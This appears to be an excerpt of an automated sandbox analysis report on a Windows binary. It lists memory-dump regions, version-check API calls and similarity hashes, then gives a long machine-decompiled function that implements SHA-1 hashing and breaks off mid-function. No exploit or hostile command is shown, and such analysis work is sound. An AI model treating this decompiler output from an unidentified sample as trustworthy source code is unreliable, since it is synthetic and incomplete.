                                                                                                                                                                        • Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00405619
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version$AddressHandleModuleProcmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3445250173-0
                                                                                                                                                                      • Opcode ID: ca349debe630e03ede182743978b1f9189fac21bd2c91363668e2a3dcb67b5c8
                                                                                                                                                                      • Instruction ID: 346969f53e1e5ba9765839da7690ba5b2fc2a1c3f22f39825daa73f0edc6c901
                                                                                                                                                                      • Opcode Fuzzy Hash: ca349debe630e03ede182743978b1f9189fac21bd2c91363668e2a3dcb67b5c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F310336E04E6583D63085188C54BA36294D7417A0FDA0F37EDDDB72C0D67F8D45AE8A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040B2E7, Relevance: 2.9, APIs: 1, Instructions: 1619COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                      			E0040B2E7() {
				void* _t659;
				void* _t660;
				signed int _t795;
				signed int _t804;
				signed int* _t809;
				signed int _t814;
				signed int _t819;
				signed int* _t824;
				signed int* _t828;
				signed int* _t832;
				signed int* _t836;
				signed int* _t841;
				signed int* _t845;
				signed int* _t849;
				signed int* _t853;
				signed int* _t858;
				signed int* _t862;
				signed int* _t866;
				signed int _t873;
				signed int _t881;
				signed int* _t885;
				signed int _t889;
				signed int _t894;
				signed int _t899;
				signed int _t903;
				signed int _t907;
				signed int _t911;
				signed int _t915;
				signed int _t919;
				signed int _t923;
				signed int _t927;
				signed int _t931;
				signed int _t935;
				signed int _t939;
				signed int _t943;
				signed int _t947;
				signed int _t953;
				signed int _t957;
				signed int _t961;
				signed int _t964;
				signed int _t966;
				signed int* _t969;
				signed int* _t972;
				signed int _t978;
				signed int _t984;
				signed int _t990;
				signed int _t996;
				signed int* _t997;
				signed int* _t1003;
				signed int* _t1009;
				signed int _t1018;
				signed int _t1025;
				signed int* _t1026;
				signed int _t1032;
				signed int _t1038;
				signed int* _t1044;
				signed int* _t1050;
				signed int* _t1056;
				signed int* _t1062;
				signed int* _t1068;
				signed int* _t1074;
				signed int* _t1080;
				signed int _t1089;
				void* _t1094;
				signed int _t1097;
				signed int _t1099;
				signed int _t1100;
				signed int _t1103;
				signed int _t1106;
				signed int _t1107;
				signed int _t1109;
				signed int _t1111;
				signed int _t1113;
				signed int* _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1123;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1132;
				signed int _t1134;
				signed int _t1197;
				signed int* _t1225;
				signed int* _t1229;
				signed int* _t1235;
				signed int* _t1238;
				void* _t1243;
				signed int _t1246;
				void* _t1249;
				signed int _t1252;
				void* _t1255;
				signed int _t1258;
				void* _t1261;
				signed int _t1264;
				void* _t1267;
				signed int _t1270;
				void* _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1281;
				void* _t1284;
				signed int _t1286;
				signed int* _t1289;
				signed int* _t1296;
				signed int* _t1303;
				signed int* _t1310;
				signed int* _t1317;
				signed int* _t1324;
				signed int* _t1331;
				signed int* _t1338;
				signed int* _t1345;
				signed int* _t1352;
				signed int* _t1359;
				signed int _t1369;
				signed int* _t1376;
				signed int* _t1380;
				signed int _t1387;
				signed int _t1394;
				signed int* _t1401;
				signed int* _t1408;
				signed int* _t1428;
				signed int* _t1430;
				signed int* _t1432;
				signed int* _t1435;
				void* _t1438;
				signed int _t1439;
				signed int* _t1440;
				signed int _t1445;
				signed int* _t1448;
				signed int* _t1458;
				intOrPtr* _t1461;
				signed int* _t1462;
				signed int _t1465;
				signed int _t1466;
				signed int _t1470;
				signed int _t1473;
				signed int _t1477;
				signed int _t1481;
				signed int _t1485;
				signed int _t1488;
				signed int _t1492;
				signed int _t1497;
				signed int _t1502;
				signed int _t1506;
				signed int _t1510;
				signed int _t1514;
				signed int _t1518;
				signed int _t1522;
				signed int _t1526;
				signed int _t1530;
				signed int _t1534;
				signed int _t1538;
				signed int _t1542;
				signed int _t1546;
				void* _t1549;
				signed int _t1553;
				signed int _t1557;
				signed int _t1561;
				signed int* _t1573;
				signed int* _t1577;
				signed int* _t1579;
				signed int _t1588;
				signed int _t1592;
				signed int _t1596;
				signed int _t1600;
				signed int* _t1602;
				signed int _t1606;
				signed int _t1610;
				signed int _t1614;
				signed int _t1616;
				signed int _t1620;
				signed int _t1624;
				signed int _t1628;
				signed int _t1632;
				signed int _t1637;
				signed int _t1642;
				signed int _t1646;
				signed int _t1650;
				signed int _t1654;
				signed int _t1658;
				void* _t1660;
				signed int _t1662;
				signed int _t1664;
				signed int _t1665;
				signed int _t1669;
				signed int _t1672;
				signed int _t1675;
				signed int _t1678;
				signed int _t1679;
				signed int _t1681;
				signed int _t1683;
				signed int _t1685;
				signed int* _t1687;
				signed int _t1688;
				signed int _t1689;
				signed int _t1690;
				signed int _t1691;
				signed int _t1692;
				signed int _t1693;
				signed int _t1695;
				signed int _t1697;
				signed int _t1699;
				signed int* _t1700;
				signed int _t1702;
				signed int _t1704;
				signed int _t1707;
				signed int _t1709;
				signed int _t1710;
				signed int _t1712;
				signed int _t1715;
				signed int _t1716;
				signed int _t1718;
				signed int _t1720;
				signed int _t1722;
				signed int _t1724;
				signed int _t1729;
				signed int _t1733;
				signed int _t1737;
				signed int _t1741;
				signed int _t1745;
				signed int _t1749;
				signed int _t1753;
				signed int _t1757;
				signed int _t1761;
				signed int _t1765;
				signed int _t1769;
				signed int _t1773;
				signed int _t1777;
				signed int _t1781;
				signed int _t1785;
				signed int _t1789;
				signed int _t1793;
				signed int _t1797;
				signed int _t1801;
				signed int _t1803;
				signed int _t1804;
				signed int _t1805;
				signed int _t1808;
				signed int _t1810;
				signed int _t1813;
				signed int _t1815;
				signed int _t1816;
				signed int _t1819;
				signed int _t1822;
				signed int _t1823;
				signed int _t1824;
				signed int _t1825;
				signed int _t1827;
				signed int _t1828;
				signed int _t1829;
				signed int _t1830;
				signed int _t1831;
				signed int _t1833;
				signed int _t1835;
				signed int _t1838;
				signed int _t1840;
				signed int _t1842;
				signed int _t1844;
				signed int _t1846;
				void* _t1849;

				_t659 =  *(_t1849 + 0xc);
				if(_t659 == 0) {
					_t660 =  *(_t1849 + 0x54);
					 *(_t1849 + 0x58) = _t660;
				} else {
					memcpy(_t659,  *(_t1849 + 0x58), 0x40);
					_t660 =  *(_t1849 + 0x64);
					_t1849 = _t1849 + 0xc;
				}
				_t1462 =  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x3c) =  *_t660 & 0xff00ff00 |  *_t660 & 0x00ff00ff;
				_t1097 = _t1462[1];
				_t1813 =  *_t1462;
				asm("rol ecx, 0x5");
				_t1707 = _t1462[3];
				_t1662 = _t1462[2];
				asm("ror ebx, 0x2");
				_t1465 = _t1462[4] + 0x5a827999 + ((_t1707 ^ _t1662) & _t1097 ^ _t1707) + _t1813 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x50) = ( *(_t1849 + 0x68))[1] & 0xff00ff00 | ( *(_t1849 + 0x68))[1] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1709 = _t1707 + 0x5a827999 + ((_t1662 ^ _t1097) & _t1813 ^ _t1662) + _t1465 +  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x38) = ( *(_t1849 + 0x68))[2] & 0xff00ff00 | ( *(_t1849 + 0x68))[2] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1664 = _t1662 + 0x5a827999 + ((_t1097 ^ _t1813) & _t1465 ^ _t1097) + _t1709 +  *(_t1849 + 0x38);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x14) = ( *(_t1849 + 0x68))[3] & 0xff00ff00 | ( *(_t1849 + 0x68))[3] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1099 = _t1097 + 0x5a827999 + ((_t1465 ^ _t1813) & _t1709 ^ _t1813) + _t1664 +  *(_t1849 + 0x14);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x10) = ( *(_t1849 + 0x68))[4] & 0xff00ff00 | ( *(_t1849 + 0x68))[4] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1815 = _t1813 + 0x5a827999 + ((_t1465 ^ _t1709) & _t1664 ^ _t1465) + _t1099 +  *(_t1849 + 0x10);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x3c) = ( *(_t1849 + 0x68))[5] & 0xff00ff00 | ( *(_t1849 + 0x68))[5] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1466 = _t1465 + ((_t1709 ^ _t1664) & _t1099 ^ _t1709) + _t1815 + 0x5a827999 +  *(_t1849 + 0x3c);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x40) = ( *(_t1849 + 0x68))[6] & 0xff00ff00 | ( *(_t1849 + 0x68))[6] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1710 = _t1709 + ((_t1664 ^ _t1099) & _t1815 ^ _t1664) + _t1466 + 0x5a827999 +  *(_t1849 + 0x40);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x44) = ( *(_t1849 + 0x68))[7] & 0xff00ff00 | ( *(_t1849 + 0x68))[7] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1665 = _t1664 + ((_t1099 ^ _t1815) & _t1466 ^ _t1099) + _t1710 + 0x5a827999 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x1c) = ( *(_t1849 + 0x68))[8] & 0xff00ff00 | ( *(_t1849 + 0x68))[8] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1100 = _t1099 + ((_t1466 ^ _t1815) & _t1710 ^ _t1815) + _t1665 + 0x5a827999 +  *(_t1849 + 0x1c);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x18) = ( *(_t1849 + 0x68))[9] & 0xff00ff00 | ( *(_t1849 + 0x68))[9] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1816 = _t1815 + ((_t1466 ^ _t1710) & _t1665 ^ _t1466) + _t1100 + 0x5a827999 +  *(_t1849 + 0x18);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x20) = ( *(_t1849 + 0x68))[0xa] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xa] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1197 = _t1816 +  *(_t1849 + 0x20) + ((_t1710 ^ _t1665) & _t1100 ^ _t1710) + _t1466 + 0x5a827999;
				 *(_t1849 + 0x34) = _t1197;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1100;
				asm("ror edx, 0x8");
				asm("rol eax, 0x8");
				_t1470 = ( *(_t1849 + 0x68))[0xb] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xb] & 0x00ff00ff;
				 *(_t1849 + 0x48) = _t1470;
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x54) = _t1816;
				_t1473 = _t1470 + _t1197 + ((_t1665 ^ _t1100) & _t1816 ^ _t1665) + _t1710 + 0x5a827999;
				_t1712 =  *(_t1849 + 0x34);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x24) = ( *(_t1849 + 0x68))[0xc] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xc] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				_t1103 = (_t1100 ^ (_t1100 ^ _t1816) & _t1712) + _t1473 +  *(_t1849 + 0x24) + _t1665 + 0x5a827999;
				asm("ror esi, 0x2");
				 *(_t1849 + 0x34) = _t1712;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1669 = ( *(_t1849 + 0x68))[0xd] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xd] & 0x00ff00ff;
				 *(_t1849 + 0x28) = _t1669;
				asm("ror edx, 0x2");
				 *(_t1849 + 0x58) = _t1473;
				_t1819 = (_t1816 ^ (_t1712 ^ _t1816) & _t1473) + _t1103 + _t1669 +  *(_t1849 + 0x30) + 0x5a827999;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1672 = ( *(_t1849 + 0x68))[0xe] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xe] & 0x00ff00ff;
				 *(_t1849 + 0x2c) = _t1672;
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1103;
				_t1715 = (_t1712 ^ (_t1712 ^ _t1473) & _t1103) + _t1819 + _t1672 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x8");
				asm("rol eax, 0x8");
				_t1675 = ( *(_t1849 + 0x68))[0xf] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xf] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1675;
				_t1678 = _t1675 + _t1715 + ((_t1473 ^ _t1103) & _t1819 ^ _t1473) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1477 =  *(_t1849 + 0x38) ^  *(_t1849 + 0x4c) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x1c);
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *( *(_t1849 + 0x68)) = _t1477;
				_t1481 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x50) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x18);
				_t1106 = (_t1103 ^ (_t1103 ^ _t1819) & _t1715) + _t1678 + _t1477 +  *(_t1849 + 0x58) + 0x5a827999;
				asm("rol edx, 1");
				asm("ror esi, 0x2");
				asm("rol ecx, 0x5");
				( *(_t1849 + 0x68))[1] = _t1481;
				_t1485 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x38) ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x20);
				 *(_t1849 + 0x34) = _t1819;
				asm("rol edx, 1");
				_t1822 = (_t1819 ^ (_t1819 ^ _t1715) & _t1678) + _t1106 + _t1481 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x2");
				( *(_t1849 + 0x68))[2] = _t1485;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1488 = _t1485 + _t1822 + ((_t1678 ^ _t1715) & _t1106 ^ _t1715) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1225 =  *(_t1849 + 0x68);
				_t795 =  *(_t1849 + 0x14) ^  *_t1225 ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x3c);
				asm("rol eax, 1");
				_t1225[3] = _t795;
				 *(_t1849 + 0x14) = _t795;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1229 =  *(_t1849 + 0x68);
				_t1716 = _t1715 + ((_t1678 ^ _t1106) & _t1822 ^ _t1678) + _t1488 + 0x5a827999 +  *(_t1849 + 0x14);
				_t804 =  *(_t1849 + 0x10) ^ _t1229[1] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x40);
				asm("rol eax, 1");
				_t1229[4] = _t804;
				 *(_t1849 + 0x10) = _t804;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1679 = _t1678 + (_t1106 ^ _t1822 ^ _t1488) + _t1716 + 0x6ed9eba1 +  *(_t1849 + 0x10);
				 *(_t1849 + 0x38) = _t1488;
				_t809 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1492 = _t809[2] ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x44) ^  *(_t1849 + 0x3c);
				asm("rol edx, 1");
				_t809[5] = _t1492;
				asm("ror esi, 0x2");
				_t1235 =  *(_t1849 + 0x68);
				_t1107 = _t1106 + (_t1822 ^  *(_t1849 + 0x38) ^ _t1716) + _t1679 + _t1492 + 0x6ed9eba1;
				_t814 = _t1235[3];
				_t1497 = _t814 ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x1c) ^  *(_t1849 + 0x40);
				asm("rol edx, 1");
				_t1235[6] = _t1497;
				 *(_t1849 + 0x14) = _t814;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1238 =  *(_t1849 + 0x68);
				_t1823 = _t1822 + (_t1679 ^  *(_t1849 + 0x38) ^ _t1716) + _t1107 + _t1497 + 0x6ed9eba1;
				_t819 = _t1238[4];
				_t1502 = _t819 ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x18) ^  *(_t1849 + 0x44);
				asm("rol edx, 1");
				 *(_t1849 + 0x10) = _t819;
				_t1238[7] = _t1502;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1243 =  *(_t1849 + 0x38) + 0x6ed9eba1 + (_t1679 ^ _t1107 ^ _t1716) + _t1823 + _t1502;
				_t824 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1243;
				asm("rol ecx, 0x5");
				_t1506 =  *_t824 ^  *(_t1849 + 0x20) ^  *(_t1849 + 0x1c) ^ _t824[5];
				asm("rol edx, 1");
				_t824[8] = _t1506;
				asm("ror ebp, 0x2");
				_t828 =  *(_t1849 + 0x68);
				_t1246 = _t1243 + _t1506 + (_t1679 ^ _t1107 ^ _t1823) + _t1716 + 0x6ed9eba1;
				_t1718 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1246;
				asm("rol ecx, 0x5");
				_t1510 = _t828[1] ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x18) ^ _t828[6];
				asm("rol edx, 1");
				_t828[9] = _t1510;
				asm("ror esi, 0x2");
				_t832 =  *(_t1849 + 0x68);
				_t1249 = _t1246 + _t1510 + (_t1107 ^ _t1823 ^ _t1718) + _t1679 + 0x6ed9eba1;
				_t1681 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1249;
				asm("rol ecx, 0x5");
				_t1514 = _t832[2] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x20) ^ _t832[7];
				asm("rol edx, 1");
				_t832[0xa] = _t1514;
				asm("ror edi, 0x2");
				_t836 =  *(_t1849 + 0x68);
				_t1252 = _t1249 + _t1514 + (_t1823 ^ _t1718 ^ _t1681) + _t1107 + 0x6ed9eba1;
				_t1109 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1252;
				asm("rol ecx, 0x5");
				_t1518 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x48) ^ _t836[8];
				asm("rol edx, 1");
				_t836[0xb] = _t1518;
				asm("ror ebx, 0x2");
				_t172 = _t1823 + 0x6ed9eba1; // 0x14577208
				_t1255 = _t172 + (_t1109 ^ _t1718 ^ _t1681) + _t1252 + _t1518;
				_t841 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1255;
				_t1522 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x24) ^ _t841[9];
				_t1824 =  *(_t1849 + 0x54);
				asm("rol edx, 1");
				_t841[0xc] = _t1522;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t845 =  *(_t1849 + 0x68);
				_t1258 = _t1255 + _t1522 + (_t1109 ^ _t1824 ^ _t1681) + _t1718 + 0x6ed9eba1;
				_t1720 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1258;
				asm("rol ecx, 0x5");
				_t1526 =  *(_t1849 + 0x30) ^  *(_t1849 + 0x28) ^ _t845[0xa] ^ _t845[5];
				asm("rol edx, 1");
				_t845[0xd] = _t1526;
				asm("ror esi, 0x2");
				_t849 =  *(_t1849 + 0x68);
				_t1261 = _t1258 + _t1526 + (_t1109 ^ _t1824 ^ _t1720) + _t1681 + 0x6ed9eba1;
				_t1683 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1261;
				asm("rol ecx, 0x5");
				_t1530 =  *_t849 ^  *(_t1849 + 0x2c) ^ _t849[0xb] ^ _t849[6];
				asm("rol edx, 1");
				_t849[0xe] = _t1530;
				asm("ror edi, 0x2");
				_t853 =  *(_t1849 + 0x68);
				_t1264 = _t1261 + _t1530 + (_t1824 ^ _t1720 ^ _t1683) + _t1109 + 0x6ed9eba1;
				_t1111 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1264;
				asm("rol ecx, 0x5");
				_t1534 = _t853[1] ^  *(_t1849 + 0x30) ^ _t853[0xc] ^ _t853[7];
				asm("rol edx, 1");
				_t853[0xf] = _t1534;
				asm("ror ebx, 0x2");
				_t1825 =  *(_t1849 + 0x54);
				_t1267 = _t1824 + 0x6ed9eba1 + (_t1720 ^ _t1683 ^ _t1111) + _t1264 + _t1534;
				_t858 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1267;
				asm("rol ecx, 0x5");
				_t1538 = _t858[2] ^  *_t858 ^ _t858[0xd] ^ _t858[8];
				asm("rol edx, 1");
				 *_t858 = _t1538;
				_t862 =  *(_t1849 + 0x68);
				_t1270 = _t1267 + _t1538 + (_t1825 ^ _t1683 ^ _t1111) + _t1720 + 0x6ed9eba1;
				_t1722 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1270;
				_t1542 =  *(_t1849 + 0x14) ^ _t862[1] ^ _t862[0xe] ^ _t862[9];
				asm("rol edx, 1");
				_t862[1] = _t1542;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				asm("ror esi, 0x2");
				_t866 =  *(_t1849 + 0x68);
				_t1273 = _t1270 + _t1542 + (_t1825 ^ _t1722 ^ _t1111) + _t1683 + 0x6ed9eba1;
				_t1685 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1273;
				asm("rol ecx, 0x5");
				_t1546 =  *(_t1849 + 0x10) ^ _t866[2] ^ _t866[0xf] ^ _t866[0xa];
				asm("rol edx, 1");
				_t866[2] = _t1546;
				_t1274 =  *(_t1849 + 0x68);
				asm("ror edi, 0x2");
				_t1549 = _t1273 + _t1546 + (_t1825 ^ _t1722 ^ _t1685) + _t1111 + 0x6ed9eba1;
				_t873 =  *(_t1849 + 0x14) ^  *_t1274 ^ _t1274[0xb] ^ _t1274[5];
				_t1113 =  *(_t1849 + 0x58);
				asm("rol eax, 1");
				_t1274[3] = _t873;
				 *(_t1849 + 0x14) = _t873;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1277 =  *(_t1849 + 0x68);
				_t1827 = _t1825 + 0x6ed9eba1 + (_t1722 ^ _t1685 ^ _t1113) + _t1549 +  *(_t1849 + 0x14);
				_t881 =  *(_t1849 + 0x10) ^ _t1277[1] ^ _t1277[0xc] ^ _t1277[6];
				asm("rol eax, 1");
				_t1277[4] = _t881;
				 *(_t1849 + 0x10) = _t881;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t885 =  *(_t1849 + 0x68);
				_t1281 = _t1827 +  *(_t1849 + 0x10) + (_t1685 ^ _t1113 ^ _t1549) + _t1722 + 0x6ed9eba1;
				 *(_t1849 + 0x58) = _t1549;
				 *(_t1849 + 0x54) = _t1281;
				_t1553 = _t885[2] ^ _t885[0xd] ^ _t885[7] ^ _t885[5];
				_t1724 =  *(_t1849 + 0x58);
				asm("rol edx, 1");
				_t885[5] = _t1553;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1284 = _t1281 + _t1553 + (_t1827 ^ _t1113 ^ _t1724) + _t1685 + 0x6ed9eba1;
				_t1687 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1284;
				asm("rol ecx, 0x5");
				_t889 = _t1687[3];
				_t1557 = _t889 ^ _t1687[0xe] ^ _t1687[8] ^ _t1687[6];
				 *(_t1849 + 0x14) = _t889;
				asm("rol edx, 1");
				_t1687[6] = _t1557;
				_t1688 =  *(_t1849 + 0x54);
				asm("ror edi, 0x2");
				_t894 = (_t1827 ^ _t1688 ^ _t1724) + _t1284 + _t1557 + _t1113 + 0x6ed9eba1;
				_t1115 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t894;
				_t1286 = _t1115[4];
				_t1561 = _t1286 ^ _t1115[0xf] ^ _t1115[9] ^ _t1115[7];
				 *(_t1849 + 0x3c) = _t1286;
				asm("rol ecx, 0x5");
				asm("rol edx, 1");
				_t1115[7] = _t1561;
				_t1116 =  *(_t1849 + 0x58);
				asm("ror ebx, 0x2");
				_t1289 =  *(_t1849 + 0x68);
				_t899 = (_t1827 ^ _t1688 ^ _t1116) + _t894 + _t1561 + _t1724 + 0x6ed9eba1;
				 *(_t1849 + 0x44) = _t899;
				asm("rol edx, 0x5");
				_t1729 =  *_t1289 ^ _t1289[0xa] ^ _t1289[8] ^ _t1289[5];
				asm("rol esi, 1");
				_t1289[8] = _t1729;
				_t1828 =  *(_t1849 + 0x48);
				_t903 = _t899 - 0x70e44324 + ((_t1116 |  *(_t1849 + 0x48)) & _t1688 | _t1116 &  *(_t1849 + 0x48)) + _t1729 + _t1827;
				asm("ror ebp, 0x2");
				_t1296 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t903;
				_t1733 = _t1296[1] ^ _t1296[0xb] ^ _t1296[9] ^ _t1296[6];
				asm("rol esi, 1");
				_t1296[9] = _t1733;
				asm("rol edx, 0x5");
				_t1689 =  *(_t1849 + 0x44);
				asm("ror edi, 0x2");
				_t907 = _t903 - 0x70e44324 + ((_t1828 |  *(_t1849 + 0x44)) & _t1116 | _t1828 &  *(_t1849 + 0x44)) + _t1733 + _t1688;
				_t1303 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t907;
				asm("rol edx, 0x5");
				_t1737 = _t1303[2] ^ _t1303[0xc] ^ _t1303[0xa] ^ _t1303[7];
				asm("rol esi, 1");
				_t1303[0xa] = _t1737;
				_t1117 =  *(_t1849 + 0x50);
				_t911 = _t907 - 0x70e44324 + (( *(_t1849 + 0x50) | _t1689) & _t1828 |  *(_t1849 + 0x50) & _t1689) + _t1737 + _t1116;
				asm("ror ebx, 0x2");
				_t1310 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x44) = _t911;
				asm("rol edx, 0x5");
				_t1741 =  *(_t1849 + 0x14) ^ _t1310[0xd] ^ _t1310[0xb] ^ _t1310[8];
				asm("rol esi, 1");
				_t1310[0xb] = _t1741;
				_t1829 =  *(_t1849 + 0x48);
				_t915 = _t911 - 0x70e44324 + ((_t1117 |  *(_t1849 + 0x48)) & _t1689 | _t1117 &  *(_t1849 + 0x48)) + _t1741 + _t1828;
				asm("ror ebp, 0x2");
				_t1317 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x40) = _t915;
				asm("rol edx, 0x5");
				_t1745 =  *(_t1849 + 0x3c) ^ _t1317[0xe] ^ _t1317[0xc] ^ _t1317[9];
				asm("rol esi, 1");
				_t1317[0xc] = _t1745;
				_t919 = _t915 - 0x70e44324 + ((_t1829 |  *(_t1849 + 0x44)) & _t1117 | _t1829 &  *(_t1849 + 0x44)) + _t1745 + _t1689;
				_t1690 =  *(_t1849 + 0x44);
				_t1324 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t919;
				asm("ror edi, 0x2");
				asm("rol edx, 0x5");
				_t1749 = _t1324[0xf] ^ _t1324[0xd] ^ _t1324[0xa] ^ _t1324[5];
				asm("rol esi, 1");
				_t1324[0xd] = _t1749;
				_t1118 =  *(_t1849 + 0x40);
				_t923 = _t919 - 0x70e44324 + ((_t1690 |  *(_t1849 + 0x40)) & _t1829 | _t1690 &  *(_t1849 + 0x40)) + _t1749 + _t1117;
				asm("ror ebx, 0x2");
				_t1331 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t923;
				asm("rol edx, 0x5");
